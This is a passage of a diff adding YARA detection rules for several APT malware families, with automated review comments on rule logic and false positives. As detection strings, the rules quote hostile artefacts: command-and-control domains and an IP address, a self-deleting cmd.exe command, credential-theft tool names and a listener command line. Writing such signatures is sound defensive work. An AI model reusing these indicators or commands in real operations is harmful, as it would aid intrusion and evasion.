+        $str3 = "Dollar General.doc\"" wide ascii
+        $str4 = "Dow Corning Corp.pdf\"" wide ascii
+    condition:
+        1 of them and APT1_RARSilent_EXE_PDF
+}
+
+
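Review bot: `APT1_payloads` (condition `1 of them`) fires on any file containing a single one of its names, and several of them — `cmd.exe`, `reg.exe`, `ntoskrnl.exe`, `update.exe`, `inetinfo.exe`, `mdm.exe` — are ordinary Windows or installer strings, so on its own the rule will match a large share of benign binaries. Changing the condition to `2 of them`, or splitting the generic filenames into a group that is not sufficient by itself, would keep it usable standalone; `APT1_aspnetreport` and `APT1_dbg_mess` AND it with their own strings, so they are narrower either way. `APT1_WEBC2_BOLID` requires the literal `http://[c2_location]/[page].html` with `all of them`, which reads like a report placeholder rather than a string taken from a sample, so that rule probably never matches — confirm against the source. In `APT1_RARSilent_EXE_PDF`, `$str2 = "Steup=\""` differs from the `Setup=` in the commented-out regex above it; if the misspelling was not observed in samples, the rule never matches the SFX script line it is meant to catch. Smaller points: `MoonProject` declares `$b` and `$d` with the same value, `GOGGLES_APT1` is a line-for-line duplicate of `GLOOXMAIL_APT1`, the hex pattern in `ccrewSSLBack2` is a suffix of the one in `HACKSFASE1_APT1`, and `import "pe"` is never used by any rule in the file.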
diff --git a/malware/APT3102.yar b/malware/APT3102.yar
new file mode 100644
index 0000000..b2078e0
--- /dev/null
+++ b/malware/APT3102.yar
@@ -0,0 +1,36 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT3102Code : APT3102 Family 
+{
+    meta:
+        description = "3102 code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $setupthread = { B9 02 07 00 00 BE ?? ?? ?? ?? 8B F8 6A 00 F3 A5 }
+  
+    condition:
+        any of them
+}
+
+rule APT3102Strings : APT3102 Family
+{
+    meta:
+        description = "3102 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "rundll32_exec.dll\x00Update"
+        // this is in the encrypted code - shares with 9002 variant
+        //$ = "POST http://%ls:%d/%x HTTP/1.1"
+        
+    condition:
+       any of them
+}
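Review bot: The `$setupthread` opcode pattern in `APT3102Code` has no comment saying what code it matches, unlike the annotated patterns in the sibling 9002 ruleset, so a maintainer cannot tell whether a non-match on a new sample is a variant or a rule defect. The bytes decode to `mov ecx,0x702 / mov esi,imm32 / mov edi,eax / push 0 / rep movsd`, i.e. a fixed-size copy of 0x702 dwords from a static address into the buffer held in eax; a comment such as `// fixed-size block copy: mov ecx,0x702 ; mov esi,<addr> ; mov edi,eax ; push 0 ; rep movsd` above the string would capture that. `import "pe"` is not referenced by either rule and can be dropped, and the tag line `rule APT3102Code : APT3102 Family ` carries trailing whitespace.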
diff --git a/malware/APT9002.yar b/malware/APT9002.yar
new file mode 100644
index 0000000..c24c4fc
--- /dev/null
+++ b/malware/APT9002.yar
@@ -0,0 +1,56 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT9002Code : APT9002 Family 
+{
+    meta:
+        description = "9002 code features"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        // start code block
+        $ = { B9 7A 21 00 00 BE ?? ?? ?? ?? 8B F8 ?? ?? ?? F3 A5 }
+        // decryption from other variant with multiple start threads
+        $ = { 8A 14 3E 8A 1C 01 32 DA 88 1C 01 8B 54 3E 04 40 3B C2 72 EC }
+  
+    condition:
+        any of them
+}
+
+rule APT9002Strings : APT9002 Family
+{
+    meta:
+        description = "9002 Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    strings:
+        $ = "POST http://%ls:%d/%x HTTP/1.1"
+        $ = "%%TEMP%%\\%s_p.ax" wide ascii
+        $ = "%TEMP%\\uid.ax" wide ascii
+        $ = "%%TEMP%%\\%s.ax" wide ascii
+        // also triggers on surtr $ = "mydll.dll\x00DoWork"
+        $ = "sysinfo\x00sysbin01"
+        $ = "\\FlashUpdate.exe"
+        
+    condition:
+       any of them
+}
+
+rule APT9002 : Family
+{
+    meta:
+        description = "9002"
+        author = "Seth Hardy"
+        last_modified = "2014-06-25"
+        
+    condition:
+        APT9002Code or APT9002Strings
+}
+
+
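Review bot: Every string in `APT9002Code` and `APT9002Strings` is anonymous (`$ =`), so a match report shows only `$` for each hit and an analyst cannot tell which pattern fired; naming them (for example `$start_block`, `$decrypt_loop`, `$post_uri`, `$tmp_p_ax`) costs nothing and makes triage and later tuning much easier. `$ = "\\FlashUpdate.exe"` is the one string in `APT9002Strings` that is a plain filename rather than a format or protocol fragment; with `any of them` it is sufficient alone, and if it also occurs in legitimate updater software it will be the rule's main false-positive source — worth checking before deployment. `import "pe"` is unused by all three rules in the file.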
diff --git a/malware/APT_Careto.yar b/malware/APT_Careto.yar
new file mode 100644
index 0000000..794a5d3
--- /dev/null
+++ b/malware/APT_Careto.yar
@@ -0,0 +1,59 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Careto_SGH {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto SGH component signature"
+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+	strings:
+		$m1 = "PGPsdkDriver" ascii wide fullword
+		$m2 = "jpeg1x32" ascii wide fullword
+		$m3 = "SkypeIE6Plugin" ascii wide fullword
+		$m4 = "CDllUninstall" ascii wide fullword
+	condition:
+		2 of them
+}
+
+rule Careto_OSX_SBD {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto OSX component signature"
+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+	strings:
+		/* XORed "/dev/null strdup() setuid(geteuid())" */
+		$1 = {FF 16 64 0A 7E 1A 63 4D 21 4D 3E 1E 60 0F 7C 1A 65 0F 74 0B 3E 1C 7F 12}
+	condition:
+		all of them
+}
+
+rule Careto_CnC {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto CnC communication signature"
+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+	strings:
+		$1 = "cgi-bin/commcgi.cgi" ascii wide
+		$2 = "Group" ascii wide
+		$3 = "Install" ascii wide
+		$4 = "Bn" ascii wide
+	condition:
+		all of them
+}
+
+rule Careto_CnC_domains {
+	meta:
+		author = "AlienVault (Alberto Ortega)"
+		description = "TheMask / Careto known command and control domains"
+		reference = "www.securelist.com/en/downloads/vlpdfs/unveilingthemask_v1.0.pdf"
+	strings:
+		$1 = "linkconf.net" ascii wide nocase
+		$2 = "redirserver.net" ascii wide nocase
+		$3 = "swupdt.com" ascii wide nocase
+	condition:
+		any of them
+}
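Review bot: Careto_CnC (L1322–L1334) rests on the two-byte string `"Bn"` and the generic words `"Group"` and `"Install"`; a two-byte ascii/wide atom is a poor search key and yara normally emits a slow-scan warning for it, and the generic words add little discrimination once `cgi-bin/commcgi.cgi` is already required. Consider replacing `$4` with a longer protocol token from the referenced report, or adding a comment explaining why these particular tokens identify the CnC exchange. Careto_OSX_SBD documents its XORed pattern in one line at L1316; the other rules would benefit from the same rationale, and a rule aimed at OS X binaries has no use for the `import "pe"` at L1294.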
diff --git a/malware/APT_DeputyDog_Fexel.yar b/malware/APT_DeputyDog_Fexel.yar
new file mode 100644
index 0000000..3b1879d
--- /dev/null
+++ b/malware/APT_DeputyDog_Fexel.yar
@@ -0,0 +1,20 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_DeputyDog_Fexel
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+strings:
+	$180 = "180.150.228.102" wide ascii
+	$0808cmd = {25 30 38 78 30 38 78 00 5C 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 [2-6] 43 00 61 00 6E 00 27 00 74 00 20 00 6F 00 70 00 65 00 6E 00 20 00 73 00 68 00 65 00 6C 00 6C 00 21}
+	$cUp = "Upload failed! [Remote error code:" nocase wide ascii
+	$DGGYDSYRL = {00 44 47 47 59 44 53 59 52 4C 00}
+	$GDGSYDLYR = "GDGSYDLYR_%" wide ascii
+condition:
+	any of them
+}
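Review bot: The condition `any of them` at L1372 lets the bare IP literal `$180` (L1366) satisfy the rule on its own, so any file that merely mentions 180.150.228.102 — an IOC list, a report, a proxy log — is classified as APT_DeputyDog_Fexel. The address is a useful corroborating indicator; consider requiring it to co-occur with one of the code strings, or moving it into a separate, clearly named network-indicator rule. The meta block (L1363–L1364) carries only `author`, unlike the other rulesets in this commit; a `description = "<what this component is — TODO fill from the source report>"` and a `reference` line would tell the analyst what a hit means.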
diff --git a/malware/APT_Hellsing.yar b/malware/APT_Hellsing.yar
new file mode 100644
index 0000000..9a182b9
--- /dev/null
+++ b/malware/APT_Hellsing.yar
@@ -0,0 +1,159 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule apt_hellsing_implantstrings : PE
+{ 
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing implants"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings: 
+		$mz="MZ"
+
+		$a1="the file uploaded failed !" 
+		$a2="ping 127.0.0.1"
+		
+		$b1="the file downloaded failed !" 
+		$b2="common.asp"
+		
+		$c="xweber_server.exe" 
+		$d="action="
+
+		$debugpath1="d:\\Hellsing\\release\\msger\\" nocase 
+		$debugpath2="d:\\hellsing\\sys\\xrat\\" nocase 
+		$debugpath3="D:\\Hellsing\\release\\exe\\" nocase 
+		$debugpath4="d:\\hellsing\\sys\\xkat\\" nocase 
+		$debugpath5="e:\\Hellsing\\release\\clare" nocase 
+		$debugpath6="e:\\Hellsing\\release\\irene\\" nocase 
+		$debugpath7="d:\\hellsing\\sys\\irene\\" nocase
+
+		$e="msger_server.dll"
+		$f="ServiceMain"
+
+	condition:
+		($mz at 0) and (all of ($a*)) or (all of ($b*)) or ($c and $d) or (any of ($debugpath*)) or ($e and $f) and filesize < 500000
+}
+
+rule apt_hellsing_installer : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing xweber/msger installers"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" 
+
+	strings: 
+		$mz="MZ"
+		
+		$cmd="cmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\""
+		
+		$a1="xweber_install_uac.exe"
+		$a2="system32\\cmd.exe" wide
+		$a4="S11SWFOrVwR9UlpWRVZZWAR0U1aoBHFTUl2oU1Y=" 
+		$a5="S11SWFOrVwR9dnFTUgRUVlNHWVdXBFpTVgRdUlpWRVZZWARdUqhZVlpFR1kEUVNSXahTVgRaU1YEUVNSXahTVl1SWwRZValdVFFZUqgQBF1SWlZFVllYBFRTVqg=" $a6="7dqm2ODf5N/Y2N/m6+br3dnZpunl44g="
+		$a7="vd/m7OXd2ai/5u7a59rr7Ki45drcqMPl5t/c5dqIZw==" 
+		$a8="vd/m7OXd2ai/usPl5qjY2uXp69nZqO7l2qjf5u7a59rr7Kjf5tzr2u7n6euo4+Xm39zl2qju5dqo4+Xm39zl2t/m7ajr19vf2OPr39rj5eaZmqbs5OSI Njl2tyI" $a9="C:\\Windows\\System32\\sysprep\\sysprep.exe" wide 
+		$a10="%SystemRoot%\\system32\\cmd.exe" wide 
+		$a11="msger_install.dll"
+		$a12={00 65 78 2E 64 6C 6C 00}
+
+	condition:
+		($mz at 0) and ($cmd and (2 of ($a*))) and filesize < 500000
+}
+
+rule apt_hellsing_proxytool : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing proxy testing tool"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back" 
+
+	strings: 
+		$mz="MZ"
+		$a1="PROXY_INFO: automatic proxy url => %s " 
+		$a2="PROXY_INFO: connection type => %d " 
+		$a3="PROXY_INFO: proxy server => %s " 
+		$a4="PROXY_INFO: bypass list => %s " 
+		$a5="InternetQueryOption failed with GetLastError() %d" 
+		$a6="D:\\Hellsing\\release\\exe\\exe\\" nocase
+
+	condition:
+		($mz at 0) and (2 of ($a*)) and filesize < 300000
+}
+
+rule apt_hellsing_xkat : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing xKat tool"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings:
+		$mz="MZ"
+		$a1="\\Dbgv.sys"
+		$a2="XKAT_BIN"
+		$a3="release sys file error."
+		$a4="driver_load error. "
+		$a5="driver_create error."
+		$a6="delete file:%s error."
+		$a7="delete file:%s ok."
+		$a8="kill pid:%d error."
+		$a9="kill pid:%d ok."
+		$a10="-pid-delete"
+		$a11="kill and delete pid:%d error."
+		$a12="kill and delete pid:%d ok."
+
+	condition:
+		($mz at 0) and (6 of ($a*)) and filesize < 300000
+}
+
+rule apt_hellsing_msgertype2 : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing msger type 2 implants"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings:
+		$mz="MZ"
+		$a1="%s\\system\\%d.txt"
+		$a2="_msger"
+		$a3="http://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%s"
+		$a4="http://%s/data/%s.1000001000"
+		$a5="/lib/common.asp?action=user_upload&file="
+		$a6="%02X-%02X-%02X-%02X-%02X-%02X"
+	
+	condition:
+		($mz at 0) and (4 of ($a*)) and filesize < 500000
+}
+
+rule apt_hellsing_irene : PE
+{
+	meta:
+		Author		= "Costin Raiu, Kaspersky Lab"
+		Date		= "2015-04-07"
+		Description	= "detection for Hellsing msger irene installer"
+		Reference	= "http://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back"
+
+	strings: 
+		$mz="MZ"
+		$a1="\\Drivers\\usbmgr.tmp" wide
+		$a2="\\Drivers\\usbmgr.sys" wide
+		$a3="common_loadDriver CreateFile error! " 
+		$a4="common_loadDriver StartService error && GetLastError():%d! " 
+		$a5="irene" wide
+		$a6="aPLib v0.43 - the smaller the better" 
+
+	condition:
+		($mz at 0) and (4 of ($a*)) and filesize < 500000
+}
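Review bot: The condition at L1420 does not gate what it appears to: `and` binds tighter than `or`, so `($mz at 0)` applies only to the `all of ($a*)` clause and `filesize < 500000` only to `($e and $f)`; a non-PE file containing `common.asp` plus `the file downloaded failed !`, or an arbitrarily large file with any debug path, still matches. If the intent is the one the sibling rules use (L1447, L1468, L1495), wrap the alternatives: `($mz at 0) and ((all of ($a*)) or (all of ($b*)) or ($c and $d) or (any of ($debugpath*)) or ($e and $f)) and filesize < 500000`. In apt_hellsing_installer, `$a5`/`$a6` (L1439) and `$a8`/`$a9` (L1441) share a physical line — legal, but easy to misread — and `$a8` contains an embedded space (`…5OSI Njl2tyI`) that looks like a line-wrap artefact from the source report rather than part of the base64 blob; worth checking against the sample, since one stray byte makes the string never match.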
diff --git a/malware/APT_Hikit.yar b/malware/APT_Hikit.yar
new file mode 100644
index 0000000..a57b492
--- /dev/null
+++ b/malware/APT_Hikit.yar
@@ -0,0 +1,16 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_Hikit_msrv
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+strings:
+	$m = {6D 73 72 76 2E 64 6C 6C 00 44 6C 6C}
+condition:
+	any of them
+}
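Review bot: The hex pattern at L1557 is undocumented; it decodes to `msrv.dll\x00Dll`, and a comment saying so (`// "msrv.dll\0Dll" — export-name fragment`) would let a reviewer judge the rule without a hex editor. The meta block (L1554–L1555) has only `author`; a `description` and `reference` line, as the Hellsing and Regin rules in this commit provide, would say what Hikit component this identifies. With a single string, `any of them` at L1559 is just `$m`; either form works, but `$m` reads more honestly.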
diff --git a/malware/APT_Kaba.yar b/malware/APT_Kaba.yar
new file mode 100644
index 0000000..78249b3
--- /dev/null
+++ b/malware/APT_Kaba.yar
@@ -0,0 +1,26 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule rtf_Kaba_jDoe
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "APT.Kaba"
+	filetype = "RTF"
+	version = "0.1"
+	description = "fe439af268cd3de3a99c21ea40cf493f, d0e0e68a88dce443b24453cc951cf55f, b563af92f144dea7327c9597d9de574e, and def0c9a4c732c3a1e8910db3f9451620"
+	date = "2013-12-10"
+strings:
+  	$magic1 = { 7b 5c 72 74 30 31 } // {\rt01
+  	$magic2 = { 7b 5c 72 74 66 31 } // {\rtf1
+  	$magic3 = { 7b 5c 72 74 78 61 33 } // {\rtxa3
+  	$author1 = { 4A 6F 68 6E 20 44 6F 65 } // "John Doe"
+  	$author2 = { 61 75 74 68 6f 72 20 53 74 6f 6e 65 } // "author Stone"
+	$string1 = { 44 30 [16] 43 46 [23] 31 31 45 }
+condition:
+  	($magic1 or $magic2 or $magic3 at 0) and all of ($author*) and $string1
+} 
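Review bot: In the condition at L1591, `at 0` binds only to `$magic3`: `$magic1 or $magic2 or $magic3 at 0` parses as `$magic1 or $magic2 or ($magic3 at 0)`, so `{\rt01` or `{\rtf1` anywhere in the file satisfies the header test. If the RTF header is meant to be anchored, write `($magic1 at 0 or $magic2 at 0 or $magic3 at 0)`. The `description` field at L1581 holds four sample hashes; the other rulesets in this commit keep digests in `hash`/`md5` fields and use `description` for what the rule detects, so `hash1 = …` through `hash4 = …` plus a one-line description would be more consistent and easier to consume programmatically.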
diff --git a/malware/APT_Mongall.yar b/malware/APT_Mongall.yar
new file mode 100644
index 0000000..953abc3
--- /dev/null
+++ b/malware/APT_Mongall.yar
@@ -0,0 +1,68 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule Backdoor_APT_Mongal
+{
+meta:
+	author = "@patrickrolsen"
+	maltype = "Backdoor.APT.Mongall"
+	version = "0.1"
+	reference = "fd69a799e21ccb308531ce6056944842" 
+	date = "01/04/2014"
+strings:
+	$author  = "author user"
+	$title   = "title Vjkygdjdtyuj" nocase
+	$comp    = "company ooo"
+	$cretime = "creatim\\yr2012\\mo4\\dy19\\hr15\\min10"
+	$passwd  = "password 00000000"
+condition:
+        all of them
+}
+
+rule MongalCode : Mongal Family 
+{
+    meta:
+        description = "Mongal code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-15"
+    
+    strings:
+        // gettickcount value checking
+        $ = { 8B C8 B8 D3 4D 62 10 F7 E1 C1 EA 06 2B D6 83 FA 05 76 EB }
+        
+    condition:
+        any of them
+}
+
+rule MongalStrings : Mongal Family
+{
+    meta:
+        description = "Mongal Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-15"
+        
+    strings:
+        $ = "NSCortr.dll"
+        $ = "NSCortr1.dll"
+        $ = "Sina.exe"
+        
+    condition:
+        any of them
+}
+
+rule Mongal : Family
+{
+    meta:
+        description = "Mongal"
+        author = "Seth Hardy"
+        last_modified = "2014-07-15"
+        
+    condition:
+        MongalCode or MongalStrings
+}
+
+
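Review bot: The rule name `Backdoor_APT_Mongal` (L1606) and the three Seth Hardy rules spell the family `Mongal`, while `maltype` (L1610) and the file name spell it `Mongall`; pick one spelling so rule names, tags and file name agree when hits are aggregated. `date = "01/04/2014"` (L1613) is ambiguous (4 January or 1 April) and differs from the ISO format the rest of the commit uses (`last_modified = "2014-07-15"`); `date = "2014-01-04"` (or `2014-04-01`, whichever was meant) removes the ambiguity. Backdoor_APT_Mongal also matches RTF property strings without checking that the file starts with an RTF header, so a plain-text copy of the same properties matches as well — if that is not intended, an anchored `{\rt` magic like the one in rtf_Kaba_jDoe would tighten it.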
diff --git a/malware/APT_NGO_wuaclt.yar b/malware/APT_NGO_wuaclt.yar
new file mode 100644
index 0000000..44209e1
--- /dev/null
+++ b/malware/APT_NGO_wuaclt.yar
@@ -0,0 +1,39 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule APT_NGO_wuaclt
+{
+   meta:
+    author = "AlienVault Labs"
+  strings:
+    $a = "%%APPDATA%%\\Microsoft\\wuauclt\\wuauclt.dat"
+    $b = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
+    $c = "/news/show.asp?id%d=%d"
+    
+	$d = "%%APPDATA%%\\Microsoft\\wuauclt\\"
+	$e = "0l23kj@nboxu"
+	
+	$f = "%%s.asp?id=%%d&Sid=%%d"
+	$g = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SP Q%%d)"
+	$h = "Cookies: UseID=KGIOODAOOK%%s"
+
+  condition:
+    ($a and $b and $c) or ($d and $e) or ($f and $g and $h)
+}
+
+rule APT_NGO_wuaclt_PDF
+{
+    	meta:
+        	author = "AlienVault Labs"
+
+	strings:
+		$pdf  = "%PDF" nocase
+		$comment = {3C 21 2D 2D 0D 0A 63 57 4B 51 6D 5A 6C 61 56 56 56 56 56 56 56 56 56 56 56 56 56 63 77 53 64 63 6A 4B 7A 38 35 6D 37 4A 56 6D 37 4A 46 78 6B 5A 6D 5A 6D 52 44 63 5A 58 41 73 6D 5A 6D 5A 7A 42 4A 31 79 73 2F 4F 0D 0A}
+	
+	condition:
+		$pdf at 0 and $comment in (0..200)
+}
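Review bot: Both rules carry only an `author` meta field (L1682–L1683, L1702–L1703) — no description, reference or date — so a hit tells the analyst nothing about what `wuaclt` is; one `description = "…"` and one `reference = "…"` line per rule would bring the file in line with the rest of the commit. The `$comment` hex at L1707 is an opaque 80-byte blob; it begins with an HTML comment opener and a base64-looking token (`<!--\r\ncWKQmZla…`), and saying so in a comment would make the rule reviewable. The strings block at L1685–L1694 also mixes four-space and tab indentation.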
diff --git a/malware/APT_OPCleaver.yar b/malware/APT_OPCleaver.yar
new file mode 100644
index 0000000..5465a11
--- /dev/null
+++ b/malware/APT_OPCleaver.yar
@@ -0,0 +1,279 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule ZhoupinExploitCrew
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+  	$s1 = "zhoupin exploit crew" nocase
+    $s2 = "zhopin exploit crew" nocase
+  condition:
+  	1 of them
+}
+
+rule BackDoorLogger
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "BackDoorLogger"
+    $s2 = "zhuAddress"
+  condition:
+    all of them
+}
+
+rule Jasus
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "pcap_dump_open"
+    $s2 = "Resolving IPs to poison..."
+    $s3 = "WARNNING: Gateway IP can not be found"
+  condition:
+    all of them
+}
+
+rule LoggerModule
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "%s-%02d%02d%02d%02d%02d.r"
+    $s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
+  condition:
+    all of them
+}
+
+rule NetC
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "NetC.exe" wide
+    $s2 = "Net Service"
+  condition:
+    all of them
+}
+
+rule ShellCreator2
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "ShellCreator2.Properties"
+    $s2 = "set_IV"
+  condition:
+    all of them
+}
+
+rule SmartCopy2
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "SmartCopy2.Properties"
+    $s2 = "ZhuFrameWork"
+  condition:
+    all of them
+}
+
+rule SynFlooder
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "Unable to resolve [ %s ]. ErrorCode %d"
+    $s2 = "your target's IP is : %s"
+    $s3 = "Raw TCP Socket Created successfully."
+  condition:
+    all of them
+}
+
+rule TinyZBot
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "NetScp" wide
+    $s2 = "TinyZBot.Properties.Resources.resources"
+
+    $s3 = "Aoao WaterMark"
+    $s4 = "Run_a_exe"
+    $s5 = "netscp.exe"
+
+    $s6 = "get_MainModule_WebReference_DefaultWS"
+    $s7 = "remove_CheckFileMD5Completed"
+    $s8 = "http://tempuri.org/"
+
+    $s9 = "Zhoupin_Cleaver"
+  condition:
+    ($s1 and $s2) or ($s3 and $s4 and $s5) or ($s6 and $s7 and $s8) or ($s9)
+}
+
+rule antivirusdetector
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+	strings:
+		$s1 = "getShadyProcess"
+		$s2 = "getSystemAntiviruses"
+		$s3 = "AntiVirusDetector"
+	condition:
+		all of them
+}
+
+rule csext
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "COM+ System Extentions"
+    $s2 = "csext.exe"
+    $s3 = "COM_Extentions_bin"
+  condition:
+    all of them
+}
+
+rule kagent
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "kill command is in last machine, going back"
+    $s2 = "message data length in B64: %d Bytes"
+  condition:
+    all of them
+}
+
+rule mimikatzWrapper
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "mimikatzWrapper"
+    $s2 = "get_mimikatz"
+  condition:
+    all of them
+}
+
+rule pvz_in
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "LAST_TIME=00/00/0000:00:00PM$"
+    $s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
+  condition:
+    all of them
+}
+
+rule pvz_out
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "Network Connectivity Module" wide
+    $s2 = "OSPPSVC" wide
+  condition:
+    all of them
+}
+
+rule wndTest
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "[Alt]" wide
+    $s2 = "<< %s >>:" wide
+    $s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
+  condition:
+    all of them
+}
+
+rule zhCat
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "zhCat -l -h -tp 1234"
+    $s2 = "ABC ( A Big Company )" wide
+  condition:
+    all of them
+}
+
+rule zhLookUp
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "zhLookUp.Properties"
+  condition:
+    all of them
+}
+
+rule zhmimikatz
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+    $s1 = "MimikatzRunner"
+    $s2 = "zhmimikatz"
+  condition:
+    all of them
+}
+
+rule Zh0uSh311
+{
+  meta:
+    author = "Cylance"
+    date = "2014-12-02"
+    description = "http://cylance.com/opcleaver"
+  strings:
+  	$s1 = "Zh0uSh311"
+  condition:
+  	all of them
+}
